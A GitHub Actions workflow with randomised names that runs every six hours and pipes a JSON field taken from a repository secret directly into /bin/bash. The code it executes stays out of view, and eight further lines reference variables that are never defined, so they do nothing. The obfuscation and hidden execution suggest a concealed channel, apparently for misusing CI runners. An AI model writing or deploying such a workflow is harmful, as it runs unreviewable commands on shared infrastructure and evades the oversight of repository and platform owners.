name: yangxiong19871010

on:
  workflow_dispatch:
  schedule:
    - cron: '2 4/6 * * *'

jobs:
  build:
    runs-on: ubuntu-latest

    steps:
      - uses: actions/checkout@v4
      - name: yangxiong19871010
        env:
          yr21295: ${{ secrets.yr21295 }}
        run: |
          echo $yr21295 | jq -r .e6 | /bin/bash
          echo $fcbgr33222 | jq -r .tkbo767 | /bin/bash
          echo $bil7980 | jq -r .a9019 | /bin/bash
          echo $uhjxm44593 | jq -r .q06704 | /bin/bash
          echo $lr655 | jq -r .cdlz71 | /bin/bash
          echo $erwbj779 | jq -r .ibv1806 | /bin/bash
          echo $nqorg18 | jq -r .l672 | /bin/bash
          echo $d35444 | jq -r .ojvpl02796 | /bin/bash
          echo $gn435 | jq -r .g5379 | /bin/bash

